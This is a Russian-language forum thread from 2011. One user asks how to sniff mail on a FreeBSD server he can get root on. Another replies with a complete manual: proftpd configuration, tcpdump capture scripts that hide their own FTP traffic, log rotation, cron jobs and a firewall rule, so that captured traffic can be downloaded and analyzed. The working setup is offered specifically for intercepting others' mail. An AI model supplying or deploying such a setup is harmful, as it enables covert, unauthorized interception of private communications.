Снифф почты

Discussion in 'Безопасность и Анонимность' started by DeluxeS, 26 Feb 2011.

  1. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    14
    Likes Received:
    82
    Reputations:
    19
    Есть сервер. Нужно посниффать почту. ОСь: FreeBSD. Есть возможность получения рута.
    Какие то команды\софт есть для этого?
     
  2. _Logger_

    _Logger_ New Member

    Joined:
    28 Oct 2010
    Messages:
    61
    Likes Received:
    1
    Reputations:
    -3
    сниффанув почту какой рут :D ??? сниффанув максимум получиш яшик и все!
     
  3. painfull

    painfull New Member

    Joined:
    23 Aug 2010
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    ... из какого-то мана - установка под фрю фтп-сервера + сбор трафика в файлы дампа. Потом качаю их по фтп и передаю в траффер. Развлекайся

    [​IMG] :)

    ============================
    ============================

    1. Настройка ftp
    1.1 Проверяем
    в rc.conf:
    proftpd_enable="YES"
    Ставим proftpd
    1.1.1
    Конфиг proftpd
    Конфигурационный файл /usr/local/etc/proftpd.conf
    #########################
    ServerName "FTP server"
    ServerType standalone
    DefaultServer on
    ServerIdent off
    Port 21
    Umask 002
    TimesGMT off
    DefaultTransferMode binary
    MaxInstances 30
    UseReverseDNS off
    IdentLookups off
    PassivePorts 35500 35600 # порты для passive mode
    AuthPamConfig proftpd
    User nobody
    Group nobody
    <limit LOGIN>
    AllowUser sec
    DenyALL
    </limit>
    <global>
    RequireValidShell off
    DefaultRoot ~
    DefaultChdir ~
    <directory ~/*>
    <limit all>
    AllowAll
    </limit>
    </directory>
    </global>
    <directory />
    AllowOverwrite on
    </directory>
    #в конце файла оставим пустую строку

    #####################

    1.2 Проверка параметра
    в /etc/shells должно быть
    "/usr/sbin/nologin"

    1.3 Добовляем юзера:
    User - user1 (укажите свой)
    В качестве shell > /usr/sbin/nologin
    домашний каталог > /var/log/tcpdump
    Pass - password1 (укажите свой)
    проверить создался ли /var/log/tcpdump, если нет mkdir /var/log/tcpdump

    2. cодаем скрипты
    2.1 для первоначального запуска
    /usr/local/etc/rc.d/traff-int_if.sh
    *************start********************
    #!/bin/sh
    if test -e /var/log/tcpdump/traff-int_if.pcap; then mv /var/log/tcpdump/traff-int_if.pcap /var/log/tcpdump/`date "+%Y-%m-%d-%H"`-traff-int_if.pcap ; fi &&
    tcpdump -i int_if -s 0 -w /var/log/tcpdump/traff-int_if.pcap 'not ( host 192.168.ХХ.254 and port ftp-data or portrange 35500-35600 )' &
    echo $! > /var/run/tcpdump.pid
    *************end*********************
    host 192.168.ХХ.254 исправить на нужный gate (ну т.е. свой гейт)
    делаем его запускаемыми
    chmod +x /usr/local/etc/rc.d/traff-int_if.sh

    2.2 для ротации логов
    /usr/local/sbin/rotate_traff-int_if.sh
    *************start********************
    #!/bin/sh
    kill `cat /var/run/tcpdump.pid` && sleep 10
    mv /var/log/tcpdump/traff-int_if.pcap /var/log/tcpdump/`date "+%Y-%m-%d-%H-%M-%S"`-traff-int_if.pcap
    find /var/log -type f -name "*traff-int_if.pcap" -mtime +7d -delete && sleep 10
    /usr/local/etc/rc.d/traff-int_if.sh
    *************end*********************
    делаем его запускаемыми
    chmod +x /usr/local/sbin/rotate_traff-int_if.sh

    2.3 проверка раз в 10 минут запущен ли ftp и если что запуск
    /usr/local/bin/pid_test.sh
    ************start********************
    #!/bin/sh
    pid_ftp=`ps ax|grep proftpd|grep -v grep|awk '{print $1}'`
    if test -z $pid_ftp; then /usr/local/etc/rc.d/proftpd start; else echo "PID Proftpd $pid_ftp"; fi &&
    *************end*********************

    3. Запуск по расписанию
    /etc/crontab
    Вносим две строчки
    ************start********************
    0 0 * * * root /usr/local/sbin/rotate_traff-int_if.sh 1>/dev/null 2>/dev/null
    */10 * * * * root /usr/local/bin/pid_test.sh 1>/dev/null 2>/dev/null
    *************end*********************

    4. Разрешение файервола
    Добавить в секцию Allow в файле /etc/pf.conf
    pass in on $int_if inet proto tcp from $internal_net to $internal_addr port { 20, 21, 35500:35600 } keep state

    user - password1

    adduser -f
    содержимое файла
    user1::::::user1:/var/log/tcpdump:/usr/sbin/nologin:password1
     
Loading...